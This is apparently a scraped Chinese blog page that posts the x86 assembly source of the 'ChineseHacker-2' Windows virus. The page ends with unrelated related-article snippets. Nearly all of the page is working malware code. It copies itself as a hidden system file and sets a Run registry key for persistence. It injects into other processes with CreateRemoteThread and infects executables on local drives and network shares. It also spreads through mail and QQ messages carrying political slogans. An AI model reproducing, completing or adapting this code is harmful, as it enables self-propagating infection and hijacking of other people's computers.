virus
virus

ChineseHacker2中国黑客2源代码

~
include wap32.inc

ApiAddressList struc
;Kernel32.DLL
KnlLoadLibraryA     dd ?
KnlCreateMutexA     dd ?
KnlGetLastError     dd ?
KnlGetCommandLineA   dd ?
KnlWinExec       dd ?  
KnlGetDriveTypeA     dd ?
KnlSetCurrentDirectoryA dd ?
KnlFindFirstFileA   dd ?
KnlFindNextFileA     dd ?
KnlFindClose           dd ?
KnlSetFileAttributesA   dd ?
KnlSetFileTime     dd ?
KnlLOpen       dd ?
KnlLRead       dd ?
KnlLWrite       dd ?
KnlLSeek       dd ?
KnlLClose           dd ?
KnlSleep           dd ?
KnlRegisterServiceProc   dd ?
KnlGetCurrentProcessId   dd ?
KnlOpenProcess       dd ?
KnlWriteProcessMemory       dd ?
KnlCreateRemoteThread       dd ?
KnlCreateKernelThread       dd ?
KnlCloseHandle       dd ?
KnlWaitForSingleObject   dd ?
KnlVirtualAllocEx       dd ?
KnlGetSystemDirectoryA   dd ?
KnlLCreat           dd ?
KnlCreateThread       dd ?
KnlTerminateThread       dd ?
KnlWideCharToMultiByte   dd ?
KnlGetComputerNameA       dd ?
KnlGetSystemTime       dd ?
;User32.DLL
UserGetWinThreadProcId   dd ?
UserFindWindowA       dd ?
UserMessageBoxA       dd ?
UserGetWindow           dd ?
UserSendMessageA       dd ?
UserwsprintfA           dd ?
;AdvApi32.DLL
AdvRegOpenKeyA       dd ?
AdvRegSetValueExA       dd ?
AdvRegQueryValueExA       dd ?
AdvRegNotifyChange       dd ?
;Mpr.DLL
MprWNetOpenEnumA       dd ?
MprWNetEnumResourceA   dd ?
MprWNetCloseEnum     dd ?
;WSock32.DLL
WsWSAStartup           dd ?
WsWSACleanup           dd ?
Wssend           dd ?
Wshtons           dd ?
Wsgethostbyname       dd ?
Wsconnect           dd ?
Wssocket           dd ?
Wsclosesocket           dd ?
Wsrecv           dd ?
;VirusData        
DataKnlMzHeader       dd ?
DataVirusSize           dd ?
DataRemoteThread       dd ?


ApiAddressList ends

MAX_BUFF_SIZE=1000h
VirusSize=offset VirusEnd-offset Start+10h

extrn MessageBoxA: proc
extrn ExitProcess: proc

.586p
.model flat,stdcall

.data

Start:
  pushad
  call     VirusEnd
NeedDecode:
  mov     esi,[esp+4*8]
  call     PushRunError     ;得到意外继续执行地址
  popad
  PushXXXCode db 68h     ;JmpOldApp
  OldEntryRVA dd offset Exit
  ret
  db     0e9h         ;静态反汇编干扰

PushRunError:
  pop     ecx
  call     SetSehFrame
FindKernel32:        
  and     esi,0fffff000h     ;得到Kernel.PELoader代码位置(不精确)
LoopFindKernel32:
  sub     esi,1000h
  cmp     word ptr[esi],'ZM'     ;搜索EXE文件头
  jnz     short LoopFindKernel32
GetPeHeader:
  movzx     edi,word ptr[esi.PEHeaderOffset]
  add     edi,esi    
  mov     ebp,[edi.fhExportsRVA]
  add     ebp,esi         ;得到输出函数表
  mov     ebx,[ebp.etExportNameList]
  add     ebx,esi         ;得到输出函数名表
  xor     eax,eax         ;函数序号计数
  mov     edx,esi         ;暂存Kernel32模块句柄
LoopFindApiStr:
  add     ebx,04
  inc     eax         ;增加函数计数
  mov     edi,[ebx]
  add     edi,edx         ;得到一个Api函数名字符串
  call     PushStrGetProcAddress
  db     'GetProcAddress',0
PushStrGetProcAddress:
  pop     esi         ;得到Api名字字符串
  xor     ecx,ecx
  mov     cl,15         ;GetProcAddress串大小
  cld
  rep     cmpsb
  jnz     short LoopFindApiStr
  mov     esi,edx
  mov     ebx,[ebp.etExportOrdlList]
  add     ebx,esi         ;取函数序号地址列表
  movzx     ecx,word ptr[ebx+eax*2]
  mov     ebx,[ebp.etExportAddrList]
  add     ebx,esi         ;得到Kernel32函数地址列表
  mov     ebx,[ebx+ecx*4]
  add     ebx,esi         ;计算GetProcAddress函数地址

  sub     esp,size ApiAddressList+10h     ;在堆栈中存放API的地址
  mov     edi,esp
 
  mov     [esp.DataKnlMzHeader],esi

  call     PushKnlApiStr    
LoopRelocKnlApi:
  mov     ebp,ecx
  call     ebx,esi
  cld
  stosd
  mov     ecx,ebp         ;定位Kernel32.dll Api
  loop     LoopRelocKnlApi

  mov     eax,[esp.KnlLoadLibraryA]
  call     PushUser32Str
  db     'USER32.DLL',0
PushUser32Str:
  call     eax
  mov     esi,eax    
  call     PushUser32ApiStr
LoopRelocUser32Api:
  mov     ebp,ecx
  call     ebx,esi
  cld
  stosd
  mov     ecx,ebp         ;定位User32.dll Api
  loop     LoopRelocUser32Api
 
  mov     eax,[esp.KnlLoadLibraryA]
  call     PushAdvApi32Str
  db     'ADVAPI32.DLL',0
PushAdvApi32Str:
  call     eax
  mov     esi,eax
  call     PushAdvApiStr
LoopRelocAdvApi32Api:
  mov     ebp,ecx
  call     ebx,esi
  cld
  stosd
  mov     ecx,ebp         ;定位ADVAPI32.dll Api
  loop     LoopRelocAdvApi32Api

  mov     eax,[esp.KnlLoadLibraryA]
  call     PushMprStr
  db     'MPR.DLL',0
PushMprStr:
  call     eax
  mov     esi,eax
  call     PushMprApiStr
LoopRelocMprApi:
  mov     ebp,ecx
  call     ebx,esi
  cld
  stosd
  mov     ecx,ebp         ;定位MPR.dll Api
  loop     LoopRelocMprApi

  mov     eax,[esp.KnlLoadLibraryA]
  call     PushWsStr
  db     'WSOCK32.DLL',0
PushWsStr:
  call     eax
  mov     esi,eax
  call     PushWsApiStr
LoopRelocWsApi:
  mov     ebp,ecx
  call     ebx,esi
  cld
  stosd
  mov     ecx,ebp         ;定位MPR.dll Api
  loop     LoopRelocWsApi

  mov     esi,esp         ;函数调用列表指针,以后固定不变

  call     PushMutexName
  db     'ChineseHacker-2',0
PushMutexName:
  call     [esi.KnlCreateMutexA],0,0
  call     [esi.KnlGetLastError]
  or     eax,eax         ;检查病毒是否已经运行
  jz     short ExecOldProgram
  int     3;         ;人工引发异常执行原程序,JmpOldApp
  db     0e9h         ;静态反汇编干扰

ExecOldProgram:             ;加载自己,运行老程序
  call     [esi.KnlGetCommandLineA]
  call     [esi.KnlWinExec],eax,L 01

  call     PushNextRunErrorProc;保护注册表与创建远程线程
  mov     esi,esp         ;意外继续执行地址
StartScan:    
  call     PushScanErrorProc;搜索本地与远程目录文件
  mov     esi,esp         ;恢复函数调用列表指针
  call     [esi.KnlSleep],1000*60;*10
  jmp     short StartScan     ;休眠10分钟重新搜索文件
  db     0e9h         ;静态反汇编干扰
PushScanErrorProc:
  pop     ecx
  call     SetSehFrame

ScanExeFile:
  call     GetFoundFileCallBackAddr
  lea     eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]    
  mov     [edx],eax     ;设置找到文件的处理程序

  call     GetFoundDirCallBackAddr
  lea     eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
  mov     [edx],eax     ;设置找到目录的处理程序

  call     EnumLogDrive     ;搜索本地文件,并传染病毒

  call     GetFoundDirCallBackAddr
  lea     eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
  mov     [edx],eax     ;设置找到NET目录的处理程序

  call     EnumNetResource     ;搜索远程文件,并传染病毒    

ScanMailFile:
  call     GetFoundFileCallBackAddr
  lea     eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
  mov     [edx],eax     ;设置找到文件的处理程序

  call     GetFoundDirCallBackAddr
  lea     eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
  mov     [edx],eax     ;设置找到目录的处理程序
  call     EnumLogDrive     ;搜索本地文件,发邮件

  call     GetFoundDirCallBackAddr
  lea     eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
  mov     [edx],eax     ;设置找到NET目录的处理程序

  call     EnumNetResource     ;搜索远程文件,发邮件

CheckRemoteAndWait:
  mov     eax,[esi.DataRemoteThread]
  call     [esi.KnlWaitForSingleObject],eax,1000*60;
  cmp     eax,-1         ;睡眠8小时
  jnz     short AddWordToQQMsg
NeedCreateRemote:
  push     esi
  call     PushWaitErrorProc
  pop     esi
  call     GetNetSendMsg
  db     'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
  pop     eax
  call     [esi.KnlWinExec],eax,0
  jmp     short CheckRemoteAndWait
PushWaitErrorProc:
  pop     ecx
  call     SetSehFrame

  call     ProcessProtect     ;重新启动远程线程保护/内带意外
  db     0e9h         ;静态反汇编干扰

AddWordToQQMsg:    
  call     GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
  pop     edi

  mov     eax,[esi.UserFindWindowA];填写线程用API
  mov     [edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
  mov     eax,[esi.UserGetWindow]
  mov     [edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
  mov     eax,[esi.UserSendMessageA]
  mov     [edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
  mov     eax,[esi.KnlSleep]
  mov     [edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax

  lea     eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
  push     eax         ;创建QQ附加消息线程
  call     [esi.KnlCreateThread],0,0,eax,eax,0,esp
  mov     ebx,eax         ;保证SendQQMsg线程活动10分钟
  pop     eax

CheckRemoteAndWaitAgain:
  mov     eax,[esi.DataRemoteThread]
  call     [esi.KnlWaitForSingleObject],eax,1000*60;
  push     eax         ;睡眠10分钟
  call     [esi.KnlTerminateThread],ebx,0
  pop     eax
  cmp     eax,-1
  jz     short NeedCreateRemoteAgain
  int     3;         ;人工意外,继续搜索文件
  db     0e9h         ;静态反汇编干扰
NeedCreateRemoteAgain:
  push     esi
  call     PushWaitErrorProcAgain
  pop     esi
  jmp     short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
  pop     ecx
  call     SetSehFrame

  call     ProcessProtect     ;重新启动远程线程保护/内带意外
  db     0e9h         ;静态反汇编干扰

PushNextRunErrorProc:         ;保护注册表与创建远程线程
  pop     ecx
  call     SetSehFrame

RegisterProtect:
  sub     esp,100h     ;构造病毒路径
  call     BuildVirusPathInStack,esp
  mov     edi,esp
 
  call     [esi.KnlLCreat],edi,10h
  cmp     eax,-1h         ;创建独占文件
  jz     short OptRegister
  mov     ebx,eax    
  call     UnzipVirusToFile;解压PE文件
  call     [esi.KnlLSeek],ebx,0,0
  call     FixPeFile,ebx     ;传染病毒给PE文件,不关闭文件,防删除
  mov     edi,esp         ;把病毒设置为:隐藏+系统+只读
  call     [esi.KnlSetFileAttributesA],edi,7h
 
OptRegister:    
  push     eax
  push     esp
  call     PushRegKeyStr
  db     'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
  call     [esi.AdvRegOpenKeyA],080000002h
  pop     ebx
  mov     eax,esp
  call     PushKeyNameStr     ;修改注册表,自动Run项目
  db     'Runonce',0
PushKeyNameStr:
  pop     ecx
  call     [esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h

  call     GetVirusBaseInEdi    
GetVirusBaseInEdi:
  pop     edi         ;得到病毒位置参照偏移量

  mov     eax,[esi.AdvRegQueryValueExA];填写API地址
  mov     [edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
  mov     eax,[esi.AdvRegSetValueExA]
  mov     [edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
  mov     eax,[esi.AdvRegNotifyChange]
  mov     [edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax

  lea     eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]        
  push     eax         ;创建注册表监视线程
  call     [esi.KnlCreateThread],0,0,eax,ebx,0,esp
  pop     eax         ;不关闭注册表句柄,监视线程续用

ProcessProtect:             ;创建远程线程
  xor     eax,eax
  mov     [esi.DataRemoteThread],eax

  sub     esp,100h
  call     BuildVirusPathInStack,esp

  call     GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
  pop     edi         ;得到病毒位置参照偏移量

  mov     eax,[esi.KnlOpenProcess];填写API地址
  mov     [edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
  mov     eax,[esi.KnlWaitForSingleObject]
  mov     [edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
  mov     eax,[esi.KnlWinExec]
  mov     [edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax    

  mov     eax,[esi.KnlRegisterServiceProc]
  or     eax,eax         ;依靠函数RehSvrProc来假定操作系统类别9x/2k
  jz     short Process2kProtect    

Process9xProtect:
  call     eax,L 0,L 1     ;在Win9x下先隐藏本进程,一级保护

  mov     edx,[esi.DataKnlMzHeader]
  movzx     ebx,word ptr[edx.PEHeaderOffset]
  add     ebx,edx
  mov     ecx,[ebx.fhObjectTable00.otRVA]
  mov     ebp,[ebx.fhHeaderSize]
  sub     ecx,ebp
  cmp     ecx,200h
  jb     short Process9xProtectEnd
  add     ebp,edx         ;查询Knl空间

  lea     edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]    
  call     MoveDataToKnl,edx,ebp,ProcessProtectProcSize
  lea     ecx,[ebp+ProcessProtectProcSize]
  mov     edx,esp         ;复制线程代码数据到Kernel32.dll
  call     MoveDataToKnl,edx,ecx,100h

  call     [esi.KnlGetCurrentProcessId]
  push     eax         ;创建Kernel线程,未公开函数
  call     [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp
  mov     [esi.DataRemoteThread],eax
  pop     eax         ;启动进程保护线程
 
  call     [esi.KnlSleep],500

Process9xProtectEnd:
  int     3         ;人工异常
  db     0e9h         ;反汇编干扰    

Process2kProtect:         ;填写API地址
  call     [esi.UserFindWindowA],0,0
  push     eax         ;找Explorer进程/或者Top窗口程序
  call     [esi.UserGetWinThreadProcId],eax,esp  
  call     [esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0
  or     eax,eax         ;打开该进程
  jz     short Process2kProtectEnd
  mov     ebx,eax
  call     [esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h
  or     eax,eax
  jz     short Close2kHandle
  mov     ebp,eax         ;分配远程空间

  lea     edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
  push     eax
  call     [esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
  pop     eax         ;复制代码到远程地址空间
  cmp     eax,ProcessProtectProcSize
  jnz     short Close2kHandle
     
  mov     edx,esp
  lea     ecx,[ebp+ProcessProtectProcSize]
  push     eax
  call     [esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp
  call     [esi.KnlGetCurrentProcessId]
  call   [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp
  mov     [esi.DataRemoteThread],eax
  pop     eax         ;启动进程保护线程    

Close2kHandle:
  call     [esi.KnlCloseHandle],ebx
  call     [esi.KnlSleep],500

Process2kProtectEnd:
  int     3         ;人工异常
  db     0e9h         ;反汇编干扰
 
PushKnlApiStr:     ;:ecx=函数名个数    
  pop     eax         ;弹出返回地址
  mov     ecx,esp
  call     PushKnlApiStr33
  db     'GetSystemTime',0
PushKnlApiStr33:
  call     PushKnlApiStr32
  db     'GetComputerNameA',0
PushKnlApiStr32:
  call     PushKnlApiStr31
  db     'WideCharToMultiByte',0
PushKnlApiStr31:
  call     PushKnlApiStr30
  db     'TerminateThread',0
PushKnlApiStr30:
  call     PushKnlApiStr29
  db     'CreateThread',0
PushKnlApiStr29:
  call     PushKnlApiStr28
  db     '_lcreat',0
PushKnlApiStr28:
  call     PushKnlApiStr27
  db     'GetSystemDirectoryA',0
PushKnlApiStr27:
  call     PushKnlApiStr26
  db     'VirtualAllocEx',0
PushKnlApiStr26:
  call     PushKnlApiStr25
  db     'WaitForSingleObject',0
PushKnlApiStr25:
  call     PushKnlApiStr24
  db     'CloseHandle',0
PushKnlApiStr24:
  call     PushKnlApiStr23
  db     'CreateKernelThread',0
PushKnlApiStr23:
  call     PushKnlApiStr22
  db     'CreateRemoteThread',0
PushKnlApiStr22:
  call     PushKnlApiStr21
  db     'WriteProcessMemory',0
PushKnlApiStr21:

  call     PushKnlApiStr20
  db     'OpenProcess',0
PushKnlApiStr20:
  call     PushKnlApiStr19
  db     'GetCurrentProcessId',0
PushKnlApiStr19:
  call     PushKnlApiStr18
  db     'RegisterServiceProcess',0
PushKnlApiStr18:  
  call     PushKnlApiStr17
  db     'Sleep',0
PushKnlApiStr17:  
  call     PushKnlApiStr16
  db     '_lclose',0
PushKnlApiStr16:
  call     PushKnlApiStr15
  db     '_llseek',0
PushKnlApiStr15:
  call     PushKnlApiStr14
  db     '_lwrite',0
PushKnlApiStr14:
  call     PushKnlApiStr13
  db     '_lread',0
PushKnlApiStr13:
  call     PushKnlApiStr12
  db     '_lopen',0
PushKnlApiStr12:
  call     PushKnlApiStr11
  db     'SetFileTime',0
PushKnlApiStr11:
  call PushKnlApiStr10
  db     'SetFileAttributesA',0
PushKnlApiStr10:
  call     PushKnlApiStr09
  db     'FindClose',0
PushKnlApiStr09:
  call     PushKnlApiStr08
  db     'FindNextFileA',0
PushKnlApiStr08:
  call     PushKnlApiStr07
  db     'FindFirstFileA',0
PushKnlApiStr07:
  call     PushKnlApiStr06
  db     'SetCurrentDirectoryA',0
PushKnlApiStr06:
  call     PushKnlApiStr05
  db     'GetDriveTypeA',0
PushKnlApiStr05:
  call     PushKnlApiStr04
  db     'WinExec',0
PushKnlApiStr04:
  call     PushKnlApiStr03
  db     'GetCommandLineA',0
PushKnlApiStr03:
  call     PushKnlApiStr02
  db     'GetLastError',0
PushKnlApiStr02:
  call     PushKnlApiStr01
  db     'CreateMutexA',0
PushKnlApiStr01:
  call     PushKnlApiStr00
  db     'LoadLibraryA',0
PushKnlApiStr00:
  sub     ecx,esp
  shr     ecx,2
  jmp     eax
  db     0e9h         ;静态反汇编干扰

PushUser32ApiStr:
  pop     eax
  mov     ecx,esp
  call     PushUser32ApiStr05
  db     'wsprintfA',0
PushUser32ApiStr05:  
  call     PushUser32ApiStr04
  db     'SendMessageA',0
PushUser32ApiStr04:  
  call     PushUser32ApiStr03
  db     'GetWindow',0
PushUser32ApiStr03:  
  call     PushUser32ApiStr02
  db     'MessageBoxA',0
PushUser32ApiStr02:  
  call     PushUser32ApiStr01
  db     'FindWindowA',0
PushUser32ApiStr01:  
  call PushUser32ApiStr00
  db     'GetWindowThreadProcessId',0
PushUser32ApiStr00:
  sub     ecx,esp
  shr     ecx,2
  jmp     eax
  db     0e9h         ;静态反汇编干扰
PushAdvApiStr:
  pop     eax
  mov     ecx,esp
  call     PushAdvApi03
  db     'RegNotifyChangeKeyValue',0
PushAdvApi03:
  call     PushAdvApi02
  db     'RegQueryValueExA',0
PushAdvApi02:
  call     PushAdvApi01
  db     'RegSetValueExA',0
PushAdvApi01:
  call     PushAdvApi00
  db     'RegOpenKeyA',0
PushAdvApi00:
  sub     ecx,esp
  shr     ecx,2
  jmp     eax
  db     0e9h         ;静态反汇编干扰

PushMprApiStr:
  pop     eax
  mov     ecx,esp
  call     PushMprAPiStr02
  db     'WNetCloseEnum',0
PushMprAPiStr02:
  call     PushMprApiStr01
  db     'WNetEnumResourceA',0
PushMprApiStr01:  
  call PushMprApiStr00
  db     'WNetOpenEnumA',0
PushMprApiStr00:
  sub     ecx,esp
  shr     ecx,2
  jmp     eax
  db     0e9h         ;静态反汇编干扰

PushWsApiStr:
  pop     eax
  mov     ecx,esp
  call     PushWsApiStr08
  db     'recv',0
PushWsApiStr08:
  call     PushWsApiStr07
  db     'closesocket',0
PushWsApiStr07:
  call     PushWsApiStr06
  db     'socket',0
PushWsApiStr06:
  call     PushWsApiStr05
  db     'connect',0
PushWsApiStr05:
  call     PushWsApiStr04
  db     'gethostbyname',0
PushWsApiStr04:
  call     PushWsApiStr03
  db     'htons',0
PushWsApiStr03:
  call     PushWsApiStr02
  db     'send',0
PushWsApiStr02:
  call     PushWsApiStr01
  db     'WSACleanup',0
PushWsApiStr01:
  call     PushWsApiStr00
  db     'WSAStartup',0
PushWsApiStr00:
  sub     ecx,esp
  shr     ecx,2
  jmp     eax
  db     0e9h         ;静态反汇编干扰

PushQQMsg:
  pop     eax
  mov     ecx,esp    
  call     PushQQMsg00
  db     '枪毙李洪志!',0
PushQQMsg00:
  call     PushQQMsg01
  db     '去他mdFLG!',0
PushQQMsg01:
  call     PushQQMsg02
  db     '反对邪教,崇尚科学!',0
PushQQMsg02:
  call     PushQQMsg03
  db     '打倒本拉登!',0
PushQQMsg03:
  call     PushQQMsg04
  db     '向英雄王伟致意!',0
PushQQMsg04:
  call     PushQQMsg05
  db     '反对霸权主义!',0
PushQQMsg05:
  call     PushQQMsg06
  db     '世界需要和平!',0
PushQQMsg06:
  call     PushQQMsg07
  db     '社会主义好!',0
PushQQMsg07:
  sub     ecx,esp    
  jmp     eax
  db     0e9h         ;静态反汇编干扰

BuildVirusPathInStack proc Stack: dword
  pushad
  mov     edi,Stack
  call     [esi.KnlGetSystemDirectoryA],edi,100h
  add     edi,eax
  call     GetVirusFileName
  db     '\runouce.exe',0
GetVirusFileName:
  pop     esi
  mov     ecx,16
  cld
  rep     movsb         ;合成病毒路径名
  popad
  ret
BuildVirusPathInStack endp
  db     0e9h         ;静态反汇编干扰

EnumLogDrive proc
  ;列举本地逻辑磁盘文件
  mov     ecx,24
  mov     edx,'\:C'
ContEnumLogDrive:
  push     ecx
  push     edx
  call     [esi.KnlGetDriveTypeA],esp
  cmp     eax,2         ;是不可访问磁盘
  jb     short ContNextLogDrive
  cmp     eax,5         ;是CDROM光盘
  jz     short ContNextLogDrive
  call     EnumFileObject,esp
ContNextLogDrive:
  pop     edx
  inc     edx
  pop     ecx
  loop     short ContEnumLogDrive
  ret
EnumLogDrive endp
  db     0e9h         ;静态反汇编干扰

EnumNetResource proc
  ;列举网络资源
  xor     edi,edi ;edi: NetData
  call     PushEnumNetWorkGroup
  call     PushEnumNetComputer
  call     PushEnumNetComputerShareDir
  call     PushEnumNetFile
  mov     eax,[edi.lpRemoteName]
  call     EnumFileObject,eax;列举计算机共享目录里的文件
  ret
  db     0e9h         ;静态反汇编干扰
PushEnumNetFile:         ;列举计算机共享目录
  call     EnumNetObject,RESOURCEUSAGE_CONNECTABLE,edi
  ret
  db     0e9h         ;静态反汇编干扰
PushEnumNetComputerShareDir:     ;列举计算机
  call     EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
  ret
  db     0e9h         ;静态反汇编干扰
PushEnumNetComputer:         ;列举工作组
  call     EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
  ret
  db     0e9h         ;静态反汇编干扰
PushEnumNetWorkGroup:         ;列举网络根
  call     EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
  ret
  db     0e9h         ;静态反汇编干扰
EnumNetResource endp

EnumNetObject proc Flag:dword,NetData:dword,CallBack:dword    
  ;用来列举局域网某种对象
  pushad
  push     eax
  call     [esi.MprWNetOpenEnumA],RESOURCE_GLOBALNET,RESOURCETYPE_DISK,Flag,NetData,esp  
  pop     ebx         ;弹出hEnum句柄,平衡堆栈
  or     eax,eax
  jnz     short EnumNetObjectError
  sub     esp,MAX_BUFF_SIZE;划分堆栈空间大小
LoopEnumNetObject:
  mov     edx,esp
  push     L 1h         ;一次列举一个
  mov     eax,esp
  push     MAX_BUFF_SIZE     ;缓冲区大小
  call     [esi.MprWNetEnumResourceA],ebx,eax,edx,esp
  pop     ecx
  pop     ecx         ;平衡堆栈
  or     eax,eax
  jnz     short EnumNetObjectOver
  mov     edi,esp
  call     CallBack     ;调用回调函数,利用edi,传递参数
  jmp     short LoopEnumNetObject
  db     0e9h         ;静态反汇编干扰
EnumNetObjectOver:
  call     [esi.MprWNetCloseEnum],ebx
  add     esp,MAX_BUFF_SIZE
EnumNetObjectError:
  popad
  ret
EnumNetObject endp
  db     0e9h         ;静态反汇编干扰

EnumFileObject proc BootDir:dword
  ;用来列举目录/网络上某个共享目录  
  pushad
  mov     eax,BootDir
  mov     eax,[eax]
  or     eax,20202020h
  cmp     eax,'nniw'     ;不感染WINN...目录
  jz     short SetDirError
  cmp     eax,'dniw'     ;不感染WIND...目录
  jz     short SetDirError
  call     [esi.KnlSetCurrentDirectoryA],BootDir ;设为当前目录
  or     eax,eax
  jz     short SetDirError
  call     FoundDirObject,BootDir
  sub     esp,MAX_BUFF_SIZE;1000h字节的缓冲区
  mov     [esp],L 2a2e2ah     ;建立"*.*"字符串
  mov     eax,esp
  call     [esi.KnlFindFirstFileA],eax,esp
  mov     ebx,eax
  cmp     eax,-1
  jz     short EnumFileObjectError  
LoopEnumFileObject:
  call     [esi.KnlFindNextFileA],ebx,esp
  or     eax,eax
  jz     short EnumFileObjectOver
  lea     edx,[esp.cFileName]
  mov     eax,[esp.dwFileAttributes]
  and     eax,10h         ;测试文件属性
  jz     short IsFileObject
IsDirObject:             ;是一个目录
  mov     eax,[edx]
  cmp     al,'.'         ;测试是否点目录,是就不处理
  jz     short LoopEnumFileObject
  call     EnumFileObject,edx;递归调用
  jmp     short LoopEnumFileObject
  db     0e9h         ;静态反汇编干扰
IsFileObject:             ;是一个文件
  call     FoundFileObject,esp;操作文件
  jmp     short LoopEnumFileObject
  db     0e9h         ;静态反汇编干扰
EnumFileObjectOver:  
  call     [esi.KnlFindClose],ebx
EnumFileObjectError:
  mov     dword ptr[esp],L 2e2eh     ;恢复原来的当前目录 建立字符串".."
  call     [esi.KnlSetCurrentDirectoryA],esp
  add     esp,MAX_BUFF_SIZE;平衡堆栈
SetDirError:
  popad
  ret
EnumFileObject endp
  db     0e9h         ;静态反汇编干扰

FoundDirObject proc DirName: dword
  pushad
  call     PushOptDirError
  popad
  ret
  db     0e9h         ;静态反汇编干扰
PushOptDirError:
  pop     ecx         ;意外忽略设置
  call     SetSehFrame
  call     GetFoundDirCallBackAddr
  call     [edx],DirName
  int     3         ;人工意外
FoundDirObject endp
  db     0e9h         ;静    

FoundFileObject proc FindData:dword    
  pushad
  call     PushOptFileError
  popad
  ret
  db     0e9h         ;静态反汇编干扰

PushOptFileError:
  pop     ecx         ;意外忽略设置
  call     SetSehFrame
  call     GetFoundFileCallBackAddr
  call     [edx],FindData
  int     3         ;人工意外
FoundFileObject endp
  db     0e9h         ;静态反汇编干扰

GetFoundDirCallBackAddr:
  call     PushFoundDirCallBackAddr
  FoundDirCallBackAddr dd ?
PushFoundDirCallBackAddr:
  pop     edx
  ret
  db     0e9h         ;静态反汇编干扰

GetFoundFileCallBackAddr:
  call     PushFoundFileCallBackAddr
  FoundFileCallBackAddr dd ?
PushFoundFileCallBackAddr:
  pop     edx
  ret
  db     0e9h         ;静态反汇编干扰

GetFileExtName proc FileName: dword
  mov     eax,FileName
ContIncEax:
  inc     eax
  cmp     byte ptr[eax],0
  jnz     short ContIncEax
  mov     eax,[eax-4]
  or     eax,20202020h
  ret
GetFileExtName endp
  db     0e9h         ;静态反汇编干扰

OptLocalDir proc DirName: dword    
  call     [esi.KnlSleep],10;消除CPU时间占有异常
  ret
OptLocalDir endp
  db     0e9h         ;静态反汇编干扰

你可能感兴趣的:(代码,职场,黑客,休闲)

  • x86-64汇编语言训练程序与实战 十除以十等于一
    本文还有配套的精品资源,点击获取简介:汇编语言是一种低级语言,与机器代码紧密相关,特别适用于编写系统级代码及性能要求高的应用。nasm编译器是针对x86和x86-64架构的汇编语言编译器,支持多种语法风格和指令集。项目Euler提供数学和计算机科学问题,鼓励编程技巧应用,前100个问题的答案可共享。x86-64架构扩展了寄存器数量并引入新指令,提升了数据处理效率。学习汇编语言能够深入理解计算机底层
  • day15|前端框架学习和算法 universe_01 前端算法笔记
    T22括号生成先把所有情况都画出来,然后(在满足什么情况下)把不符合条件的删除。T78子集要画树状图,把思路清晰。可以用暴力法、回溯法和DFS做这个题DFS深度搜索:每个边都走完,再回溯应用:二叉树搜索,图搜索回溯算法=DFS+剪枝T200岛屿数量(非常经典BFS宽度把树状转化成队列形式,lambda匿名函数“一次性的小函数,没有名字”setup语法糖:让代码更简洁好写的语法ref创建:基本类型的
  • Git 与 GitHub 的对比与使用指南 一念& 其它gitgithub
    Git与GitHub的对比与使用指南在软件开发中,Git和GitHub是两个密切相关但本质不同的工具。下面我将逐步解释它们的定义、区别、核心概念以及如何协同使用,确保内容真实可靠,基于广泛的技术实践。1.什么是Git?Git是一个分布式版本控制系统,由LinusTorvalds于2005年创建。它的核心功能是跟踪代码文件的变化,帮助开发者管理项目历史记录、协作和回滚错误。Git是开源的,可以在本地
  • 深入解析JVM工作原理:从字节码到机器指令的全过程
    一、JVM概述Java虚拟机(JVM)是Java平台的核心组件,它实现了Java"一次编写,到处运行"的理念。JVM是一个抽象的计算机器,它有自己的指令集和运行时内存管理机制。JVM的主要职责:加载:读取.class文件并验证其正确性存储:管理内存分配和垃圾回收执行:解释或编译字节码为机器指令安全:提供沙箱环境限制恶意代码二、JVM架构详解JVM由三个主要子系统组成:1.类加载子系统类加载过程分为
  • 第28章 汇编语言--- 异常处理 hummhumm 汇编算法开发语言程序设计高级语言异常处理汇编语言
    在汇编语言中,异常处理是一个重要的概念,它涉及到处理器如何响应和处理程序运行时发生的非正常情况。异常可以是硬件错误(例如除零错误、非法指令)或者软件触发的中断(例如系统调用)。当发生异常时,处理器会暂停当前正在执行的程序,并转移到一个预先定义好的位置来处理这个异常。为了详细阐述第28章关于汇编语言中的异常处理,我们可以考虑一个简化的例子,展示异常处理的基本结构。请注意,实际的代码将取决于具体的处理
  • 【C++算法】76.优先级队列_前 K 个高频单词 流星白龙 优选算法C++c++算法开发语言
